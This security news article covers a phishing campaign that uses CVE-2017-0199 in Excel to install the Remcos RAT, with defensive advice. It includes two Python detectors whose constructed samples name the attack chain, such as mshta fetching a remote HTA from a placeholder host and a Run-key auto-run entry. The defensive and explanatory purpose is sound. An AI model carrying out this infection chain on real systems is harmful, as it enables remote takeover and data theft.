The Remcos RAT Trap: How Phishing Campaigns Are Exploiting Old Vulnerabilities for Remote Control


The misuse of remote access tools (RATs) in cyberattacks is on the rise, with attackers evading security controls and exploiting known vulnerabilities to deploy them. The stakes are high because a RAT gives the attacker broad, persistent control over the victim’s device. One such attack is a phishing campaign recently observed in the wild by Fortinet’s FortiGuard Labs, which exploits a long-known Remote Code Execution (RCE) vulnerability in Microsoft Office, delivered through an Excel attachment, to install the Remcos RAT.

By combining social engineering with a vulnerability exploit, the threat actors gain a foothold on the target device and put its data and its user at risk. What makes this campaign alarming is how readily a legitimate, commercially sold tool like Remcos can be turned to malicious ends, which underscores the need for layered defenses.

How the Campaign Unfolds: From Phishing Email to Full Device Control

The initial point of entry is a phishing email carrying a seemingly harmless Excel document described as an order file. The attackers borrow the name of a real company and cite that company’s website to make the message look legitimate. Framing the attachment as an order gives the target a business reason to open it.

Once the recipient downloads and opens the document to view the “order”, the next stage begins: the Excel file contains an OLE object that exploits the RCE vulnerability CVE-2017-0199.

Exploiting CVE-2017-0199: A Known Vulnerability as the Gateway

CVE-2017-0199 was disclosed and patched in 2017, yet threat actors still rely on it. The flaw lies in how Excel and other Microsoft Office applications handle linked OLE objects: when the document is opened, Office fetches the linked content from a remote server and, because the server labels the response as an HTML Application (HTA), hands it to mshta.exe, a Windows-native script host, which runs it without prompting the user. In this campaign the HTA carries PowerShell code that downloads a file named dllhost.exe; that file extracts further components and ultimately installs the Remcos malware.
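The delivery mechanism described above leaves a static fingerprint in the document itself: an OOXML package stores every OLE object as a relationship entry in a *.rels part, and a linked (rather than embedded) object is marked TargetMode="External" with a URL target. The following Python check is an added example, not code from Fortinet or from the campaign; it builds a constructed, minimal xlsx-shaped zip (not a valid workbook) and the URL http://203.0.113.10/order.hta is a placeholder from the documentation address range.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces/relationship types are defined by the OOXML (ECMA-376) standard.
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def find_external_ole_links(ooxml_bytes):
    """Scan every relationship part (*.rels) in an OOXML package and return
    (part_name, target) for each OLE object relationship whose target is external.
    Embedded OLE objects (no TargetMode, target under embeddings/) are normal and
    are not reported; an OLE object pointing at a URL is the linked-object pattern
    that CVE-2017-0199 abuses to pull an HTA from an attacker's server."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(part))
            except ET.ParseError:
                continue  # a malformed rels part is odd, but outside this check's scope
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if (rel.get("Type") == OLE_OBJECT_REL
                        and rel.get("TargetMode", "Internal") == "External"):
                    hits.append((part, rel.get("Target")))
    return hits


def build_sample_workbook(external_ole_target=None):
    """CONSTRUCTED test input: only the parts this check reads are populated, so
    the result is xlsx-shaped but not a workbook Excel would open. One embedded
    (benign) OLE relationship is always present; an external one is added on demand."""
    rels = ['<Relationship Id="rId1" Type="%s" Target="../embeddings/oleObject1.bin"/>'
            % OLE_OBJECT_REL]
    if external_ole_target:
        rels.append('<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>'
                    % (OLE_OBJECT_REL, external_ole_target))
    sheet_rels = ('<?xml version="1.0" encoding="UTF-8"?>'
                  '<Relationships xmlns="%s">%s</Relationships>' % (PKG_REL_NS, "".join(rels)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("xl/worksheets/sheet1.xml", '<?xml version="1.0"?><worksheet/>')
        pkg.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
        pkg.writestr("xl/embeddings/oleObject1.bin", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    print("clean:", find_external_ole_links(build_sample_workbook()))
    print("linked HTA:", find_external_ole_links(
        build_sample_workbook("http://203.0.113.10/order.hta")))
```

The check only covers the zip-based OOXML formats (xlsx, docx, pptx). Legacy binary .xls/.doc files are OLE2 compound documents and need an OLE2 parser, and the RTF variants of CVE-2017-0199 carry the link inside \object control words, so each of those needs its own parser; a mail gateway that inspects attachments should handle all three.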

Old vulnerabilities that have long been known and patchable can still present high levels of risk. Especially when it comes to frequently used applications like Microsoft Office tools, vulnerabilities that are allowed to go unpatched can provide bad actors with the entry point they need to launch an attack. This attack campaign highlights the importance of keeping all software up to date to prevent threats like this that exploit old vulnerabilities in new ways.

Anti-Detection Techniques: How Remcos Evades Security Measures

The campaign is built to resist analysis and evade detection. The malicious code is buried under several layers of different scripting languages, including JavaScript and VBScript, and several encodings such as Base64 and URL encoding (obfuscation rather than encryption, but enough to defeat simple signature matching). Once running, the malware installs a vectored exception handler, resolves Windows APIs dynamically at runtime, performs anti-debugging checks, and uses API hooking and process hollowing to hide from analysis tools.

Using PowerShell and DLL execution, the campaign also establishes persistence by adding an auto-run entry so that it regains control of the device after a reboot. Together, these obfuscation, deception, and persistence techniques make the attack hard for traditional security tools to detect and block.
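However well the payload itself is obfuscated, the chain described in this article (Excel spawning mshta.exe, mshta.exe spawning PowerShell, a file called dllhost.exe running from a user-writable directory, and an auto-run entry being written by that process tree) is visible in endpoint telemetry. The following Python detector is an added example, not Fortinet's code or the campaign's; it runs over constructed, Sysmon-style process-creation (Event ID 1) and registry-set (Event ID 13) events, reconstructs the process tree from pids, and applies four rules. Paths, pids, the SID and the value name Updater are all made up for the sample.

```python
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
RUN_KEY_MARKER = "\\currentversion\\run\\"


def _base(path):
    return ntpath.basename(path).lower()


def build_process_tree(events):
    """pid -> (image, ppid) from process-creation events. Real Sysmon EID 1 also carries
    ParentImage and process GUIDs; pids alone are reused over time, so a production
    version should key on GUIDs."""
    return {e["pid"]: (e["image"], e["ppid"]) for e in events if e["event_id"] == 1}


def ancestors(tree, pid):
    """Yield the image name of pid and of every ancestor known to the tree."""
    seen = set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        image, ppid = tree[pid]
        yield _base(image)
        pid = ppid


def detect(events):
    """Return (rule_name, pid) for each event matching one of the chain's stages."""
    tree = build_process_tree(events)
    alerts = []
    for e in events:
        if e["event_id"] == 1:
            img = _base(e["image"])
            parent = _base(tree[e["ppid"]][0]) if e["ppid"] in tree else ""
            # Stage 1: Office handing a fetched HTA to mshta.exe.
            if img == "mshta.exe" and parent in OFFICE_APPS:
                alerts.append(("office_spawned_mshta", e["pid"]))
            # Stage 2: HTA script launching PowerShell (any depth below mshta.exe).
            if img in {"powershell.exe", "pwsh.exe"} and "mshta.exe" in set(ancestors(tree, e["ppid"])):
                alerts.append(("powershell_under_mshta", e["pid"]))
            # Stage 3: a binary named like a system component outside the system directories.
            if img == "dllhost.exe" and not e["image"].lower().startswith(SYSTEM_DIRS):
                alerts.append(("dllhost_outside_system_dir", e["pid"]))
        elif e["event_id"] == 13:
            # Stage 4: an auto-run value written by anything descended from an Office app.
            if RUN_KEY_MARKER in e["target_object"].lower() and OFFICE_APPS & set(ancestors(tree, e["pid"])):
                alerts.append(("run_key_from_office_chain", e["pid"]))
    return alerts


# CONSTRUCTED sample telemetry: one infection chain plus benign noise.
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 1000, "ppid": 900, "image": r"C:\Windows\explorer.exe"},
    {"event_id": 1, "pid": 2000, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"event_id": 1, "pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta http://203.0.113.10/order.hta"},
    {"event_id": 1, "pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"event_id": 1, "pid": 2300, "ppid": 2200, "image": r"C:\Users\victim\AppData\Roaming\dllhost.exe"},
    {"event_id": 13, "pid": 2300,
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    # benign: the real COM surrogate under svchost, and an Excel instance that spawns nothing
    {"event_id": 1, "pid": 3000, "ppid": 800, "image": r"C:\Windows\System32\dllhost.exe"},
    {"event_id": 1, "pid": 4000, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Each rule on its own is noisy in some environments (legitimate HTAs exist, and admins run PowerShell from odd places), which is why the rules are tied to the parent chain rather than to a process name alone; the first rule, an Office application starting mshta.exe, is rare enough in most fleets to page on by itself.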

The Risks of Commercial RATs in Cybercrime

Remcos (short for Remote Control and Surveillance) began as a commercially sold remote administration tool, but threat actors have repeatedly repurposed it as malware over the years. When a capable RAT is openly available for purchase, the barrier to running a campaign like this one drops considerably.

On the whole, the trend of threat actors leveraging legitimate tools for malicious purposes has significant implications for cybersecurity. When attackers use the same tools that many individuals and organizations employ legitimately, the line between benign and malicious activity blurs, and it becomes harder for security teams and prevention tools to separate genuine threats from routine administration.

Protective Measures: How to Defend Against RAT-Based Phishing Campaigns

Protecting against phishing campaigns that deliver RATs requires a layered defense, because an attack like this has many moving parts: the lure, the exploit, the staged downloads, and the persistence mechanism. Prompt patching is the most direct control here; CVE-2017-0199 was fixed by Microsoft in April 2017, and a patched Office installation will not hand the linked HTA to mshta.exe. Where mshta.exe is not needed for business purposes, application control policies that block or restrict it remove that link in the chain as well. As this campaign shows, even years-old vulnerabilities can be exploited in new ways and cause significant damage.

It is also important to deploy anti-phishing and behavioral monitoring tools. Behavioral monitoring that watches for an Office application spawning mshta.exe or PowerShell will catch this chain even when the document itself is new, whereas relying solely on traditional defenses such as signature-based detection is far less effective against a payload wrapped in multiple layers of obfuscation.

User security awareness training is vital for all organizations as well. “Since the attack relies on convincing users to open documents, attackers can exploit human vulnerabilities, which is often easier than bypassing technical safeguards,” according to Jason Soroko, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM). Some security tools include anti-phishing features, but user education and awareness are also essential to any phishing prevention strategy. Training should be continuous and regularly updated, teaching users about the dangers of phishing and how to recognize and avoid lures such as an unsolicited “order” attachment from an unfamiliar sender.

Staying Ahead of Evolving Threats

This recent Remcos RAT phishing campaign highlights several important factors in threat trends: the dangers posed by attackers leveraging RATs, the importance of keeping software updated, and the evolution of phishing tactics to increase their efficacy. Organizations and individuals alike must be vigilant to the risk posed by phishing scams and take proactive steps to secure their systems against these threats.

Threat trends and cybersecurity technology are constantly evolving, and it is vital to invest in security practices and tools that are equipped to handle advanced and developing threats. Cybercriminal tactics and tools like phishing and malware campaigns are increasingly sophisticated as attackers continuously attempt to evade security measures. Security measures should be adaptable and scalable to maintain effectiveness over time.

Author
  • Contributing Writer, Security Buzz
    PJ Bradley is a writer from southeast Michigan with a Bachelor's degree in history from Oakland University. She has a background in school-age care and experience tutoring college history students.